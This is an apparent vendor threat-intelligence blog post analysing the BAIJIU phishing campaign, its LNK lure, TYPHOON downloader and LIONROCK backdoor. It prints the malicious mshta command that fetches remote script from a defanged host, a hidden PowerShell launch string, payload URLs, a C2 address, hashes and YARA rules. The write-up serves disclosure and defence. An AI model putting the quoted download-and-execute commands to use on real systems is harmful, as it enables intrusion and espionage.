Attack Analysis - Background and Lure

With international attention focused on the tinderbox of the Korean peninsula, Cylance is shedding new light on a threat we call BAIJIU, one that preys upon heightened interest into what’s going on inside the borders of the hermit kingdom of North Korea.

BAIJIU, which evades widespread detection, abuses global concern about the dire humanitarian situation in North Korea. It enters the target environment through an LNK file on the end of a phishing hook with the following bait:

 “2016 North Korea Hamgyung [sic] province flood insight.”

The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that wiped out much of North Korea’s province of North Hamgyong, impacting more than half a million people, drawing world-wide notice, and commanding international news coverage for several months.

Despite the media attention, details were sparse regarding the extent and aftermath of the crisis. Reports surfaced of attempts at escape and defection to neighboring China, after border forces and fencing were washed away.

Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945. The dictatorship appealed to the UN and aid groups for help with relief efforts, and asked the international community for monetary support.

How the crisis was resolved, and what its lasting impact was on North Korea is anyone’s guess. Exactly how many people died or were displaced? Were North Korea’s official pronouncements to be believed? BAIJIU’s attackers bet that many of their phishing targets would click on their attachment to find out just that – in other words, they would take the bait.

Attack Analysis – Provenance and C2

BAIJIU’s goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.

Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities (of 1990s fame); and the use of multiple methods of obfuscation. These features have, as far as we can see, helped BAIJIU evade nearly every antivirus (AV) solution.        

Cylance believes TYPHOON/LIONROCK’s provenance is likely Chinese, and that it probably evolved from the Egobot codebase first described by Symantec here and is subsequently connected to the larger Dark Hotel Operation written up by Kaspersky here.

The tip of the spear – the LNK file itself – was a shortcut to execute the following command:

C:\Windows\System32\cmd.exe /C start "" mshta "about:<script>map1='hxxps://support.google(dot)com/maps/answer/3093609?co=GENIE.Platform_Desktop';map2='hxxps://support.google(dot)com/maps/answer/437584?co=GENIE.Platform_Desktop';map3='hxxps://support.google(dot)com/maps/answer/125748?co=GENIE.Platform_Desktop';</script><script>window.moveTo(99999,99999)</script><script language='javascript' src='hxxp://www.geocities(dot)jp/zboard01/001/1.tmp'></script><script>window.close()</script>""

Ultimately, the JavaScript of interest would be downloaded and executed from:

“hxxp://www.geocities(dot)jp/zboard01/001/1.tmp”. 

GeoCities, now owned by Yahoo, is a web hosting service in Japan which anyone with a Yahoo email address can use. The service is free and does not require users to identify themselves beyond providing a Yahoo email address. These features make it attractive to ordinary users, but seem to have also drawn those who see value in appropriating the service for illicit ends. 

We realize GeoCities may seem like a total blast from the past, but Cylance is not alone in noticing its second act revival and its apparent popularity as a launching pad for malware.

A security researcher known as “unixfreaxjp" who founded non-profit security research group “malwaremustdie.org,” found that GeoCities has recently been leveraged in separate targeted attacks to deliver Poison Ivy payloads in March 2017. “Poison Ivy” has long been associated with Chinese APT groups. You can read more about this researcher’s findings on the use of GeoCities here

Over the course of our investigation, Cylance saw that GeoCities was being heavily leveraged across multiple campaigns. We identified ten active sites hosted on the service that were used to deliver similar malicious payloads (see the end of this blog for full details).

Attack Analysis - Malware

Our analysis of “hxxp://www.geocities(dot)jp/zboard01/001/1.tmp” shows that the first six lines of “1.tmp” set up encoded variables:

These lines were immediately of interest, and tracing their use in the code led to a function called  “EXR,” which was used to decode the variables.

We coded EXR in python below for easy reuse:

def EXR(p):
              s = ''
              for x in p:
                             c = 0
                             if ord(x)&64 != 0:
                                            c = c | 0x20
                             else:
                                            c = c & 0xDF
                             if ord(x)&32 != 0:
                                            c = c | 0x40
                             else:
                                            c = c & 0xBF
                             if ord(x)&16 != 0:
                                            c = c | 0x02
                             else:
                                            c = c & 0xFD
                             if ord(x)&8 != 0:
                                            c = c | 0x08
                             else:
                                            c = c & 0xF7
                             if ord(x)&4 != 0:
                                            c = c | 0x04
                             else:
                                            c = c & 0xFB
                             if ord(x)&2 != 0:
                                            c = c | 0x10
                             else:
                                            c = c & 0xEF
                             if ord(x)&1 != 0:
                                            c = c | 0x01
                             else:
                                            c = c & 0xFE
                             s += chr(c)
              return s

Figure 2: Python Snippet to Decode Variables

“pa0” was never referenced anywhere else in the code. But the rest of the variables from Figure 1 decoded to the following:


The two files, “nomz32.tmp” and “nomz64.tmp”, hosted on GeoCities Japan, were a 32bit and 64bit DLL, respectively, with the “MZ” header removed. Removing the “MZ” header appears to have significantly aided in decreasing detection rates, as neither file was flagged by traditional or NextGen AV. 

In fact, this was almost surely a deliberate attempt by the attackers to evade common network intrusion signatures. But it also may have been necessary to upload the files to GeoCities in the first place.

Either way, the 1.tmp JavaScript code block contained a function, which would write back the header after the respective file was already downloaded to the hard drive:

nomz32.tmp – 8b1688d3779f408262d0eca9f486f9039e3607a07e20df52181b4ba585c1939a
regsv32.dll – 30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207
nomz64.tmp – d352cdf812645e6f2d890da871ee3ae95c0be7a2520af49132f2b50080fbd67a
regsv64.dll – 9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a

The files both conveniently utilized the same string-encoding algorithm as the JavaScript, which sped up analysis quite a bit. Both DLLs functioned as elaborate launchers for a PowerShell script encoded within their resource sections.

Instead of utilizing the FindResource or FindResourceEx functions, the backdoors mapped the entire file using CreateFileMappingW and MapViewOfFile, then proceeded to search for the string “<<<:resource”.

Once the string was identified the PowerShell script was decoded by XOR’ng every byte against the byte 0x1F. This was likely done in an attempt to evade established detection methods for this type of obfuscation.

The script was then invoked using the following command: “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile Invoke-Command -scriptblock {%s}” where %s was the contents of the decoded script. The backdoors both employed a number of tricks to avoid automated emulation and analysis as well as simple tricks to hinder debugging. 

Both files were also signed using an expired digital certificate belonging to “www.mywellnessmatters.com”.

Certificate Details:
Name: www.mywellnessmatters.com
Valid: Feb 19, 2007 to Feb 22, 2010
Serial Number: 20 18 98 C3 00 00 00 00 74 E0

The PowerShell script encoded within the resource section used some rudimentary methods to obfuscate variable and function names by rendering them to arbitrary combinations of the characters “\/_=”.

However, it conveniently employed the same string-encoding algorithm as the JavaScript:


Further analysis of the script showed it was a rather elegant launcher that would routinely query the sites listed above and sleep if nothing was available.

Cylance succeeded in downloading “hxxp://www.geocities(dot)jp/toedu01/informa(dot)txt”, a secondary PowerShell script. This PowerShell script was responsible for delivering and executing the final payloads. Fortunately for us, it also utilized the same method of string encoding:



The script would download the respective 32-bit (scnpst32.tmp and contab32.tmp) or 64-bit payloads (scnpst64.tmp and contab64.tmp). And once downloaded to disk, it would write back the “MZ” header to each file.

The scnpstXX.tmp DLLs functioned as loaders for their respective 32-bit or 64-bit contabXX.tmp files. Both scnpstXX.tmp files were additionally signed with an unusual expired certificate with an Icelandic flavor:

Certificate Details:
Name: secure.hotelcentrum.is
Valid: Feb 27, 2005 to March 30, 2007
Serial Number: 03 36

Although the name aligns with a popular Icelandic hotel, Hotel Reykjavík Centrum, the certificate does not seem to belong to the hotel itself. 

The files also employed a slightly different encoding mechanism involving several byte shifts and a single-byte XOR for several strings, which would have likely triggered AV heuristics.

The contabXX.tmp DLLs were full-featured backdoors that provided the attacker the ability to enumerate and manipulate files, enumerate drive and volume information, manipulate processes, enumerate and manipulate registry information, upload/download files, capture screenshots, and securely remove traces of the backdoor.

The DLLs would accept the following commands.

•  activeport
•  ddel
•  ddir
•  diskinfo
•  exit
•  find
•  httpget
•  packetsize
•  prockill
•  proclist
•  procspawn
•  recent
•  regkeydel
•  reglist
•  reglistall
•  regvaldel
•  rereg
•  screenauto
•  screenupload
•  sdir
•  strings
•  system
•  timeout
•  upload
•  wipe

Both samples communicated back to the IP address “103.8.27.135.” Additional analysis is ongoing into the network protocol itself.

Cylance was unable to find additional lures. However, as mentioned above, numerous similar payloads and scripts were identified across GeoCities Japan websites.

TYPHOON Payloads:

hxxp://www.geocities[dot]jp/akikoakagi1013/nomz32.tmp
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz64.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz32.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz64.tmp

LIONROCK Payloads

hxxp://www.geocities[dot]jp/coloseaer_0812/contab32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/contab64.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst64.tmp

PowerShell Scripts:

hxxp://www.geocities[dot]jp/hanakofukumoto/colinsta.txt
hxxp://www.geocities[dot]jp/junkohagiwara3/readmesub.txt
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_m.tmp
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_s.tmp
hxxp://www.geocities[dot]jp/pboard01/informab.txt
hxxp://www.geocities[dot]jp/toedu01/informa.txt

Conclusions:

BAIJIU’s circuitous route from LNK file to LIONROCK backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out.

BAIJIU attackers likely employed this strategy to throw researchers and investigators off their track, and ensure only the targeted victims received the payloads. Automated sandbox systems would also presumably fail to reach the final payloads, as numerous sleep loops were present in the PowerShell scripts, in addition to anti-emulation tricks in the DLL downloader. 

Appropriating the GeoCities’ free, high-bandwidth, civilian infrastructure also helps BAIJIU hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo’s GeoCities.

While Cylance maintains that an explication of new attack methods is more valuable to end-users than speculative attempts at attribution, the skill level employed by BAIJIU suggests a worthy adversarial threat.

Whoever BAIJIU’s authors are or what their intent may be, one thing is clear: the TYPHOON/LIONROCK attack chain has evaded nearly every legacy AV and NextGen AV solution on the market today. Cylance is the exception.

TYPHOON Samples:

16486b17c635038d0ff0a035d5c0c89bbd62ca6d85b4161060c5bd05de69924e

2cc0dbe268f4184b167aff4089feaa8a3ee91eac6a25112c9498558e8bab193c

30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207

3d7fce51cbab9847bd4ab95ccd9db7cc6c096add99b6285639be5231ff6013c6

422addad546c4418173751567d18a05b080285910c9199b544d6f08f15838a22

4a3dba1be5634477b99b9940a7adebdf81c2746172aad5fd08e2366e19bb7a7f

6b0042fa0a599f0e4530806474f765f2896eeca69d9489eabb4ff9aac284acd8

9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a

LIONROCK Samples:

22092aefddda66776c344ee5a239ea988ed70a20176ce7977aff7debde61253b

26108999e34af20b4f730e0a937435e2da108b6014a8f6c3b5d2c213499b0476

4fa44236abd43d0da4a46765eb1da5d070a06d0b2fc16e728dda729f31d9e55d

62f4c97791109991904173c6d8ef6ffcd834a6944dff2395421fd504ebb6a631

6b0c3e4980355687fc39e86e18dff9ddb323d2048a20eb2f253d884881b41f6c

8608081e5d76b0eacfefa2c57de683655cb70fcfe22b222dbc6afeb7b8102226

bdd24214a52f995a51e41f5061d2dfb02159abfd157de205c9359d5a9cab06a2

c561fd9cc5e6eb10f17935eee88b841e125b1a08a6d500243ea5084629904183

c72121a61ca608e57ccb8a17e6d2c8e621f5c51e9b701bdf38a4a673dcf3b077

def1c8c557b33294e1334479a6a1840be21b1fcfe82ecd120e4a296fba78107b

Javascript Payload:

63499f7445158553c7b15484ccd18e4147dc7dc8205e6b62abc5f52071b1df9f

YARA Rules:

rule Lionrock_Powershell
{
strings:
              $http = "hffbZ]]"
              $geo = "www\\ue}qifies\\xb]"
condition:
              $http or $geo
}
rule Typhoon_Downloader
{
strings:
              $ps = "<<<:resource"
              $exp = "start_adobeup"
              $e = "W78D432S34A9"
              $f = "!SJ1B0RSWRKK"
              $b = "wyy}EBB"
              $geo = "hhhCjzbnvyvzlCg}B"
condition:
              $ps or $exp or ($e and $f) or $b or $geo
}
rule Lionrock_Loader
{
strings:
              $a = "sfarfdk|amiqd|s"
              $b = "s1-s{wlsz,s"
              $c = "q}llyer|eldll"
condition:
              ($a and $b) or $c
}
rule Lionrock_Backdoor
{
strings:
              $a = "windows\\currentversion\\run;reglist"
              $power = "b}wershell\\eje@M|}br}tile@)|v}yeM1}mma|d@Msqribfpl}qy{DbafhOUEsU[DdafaO5efM1}|fe|f@Dbafh[t}reaqhHDqmd@i|@DdafaI{iej@Dqmd[oo"              $b = "agf}ejeqdir"
             $c = "sfarfdk|amiqd|s"
condition:
             $power or $b or ($a and $c)
}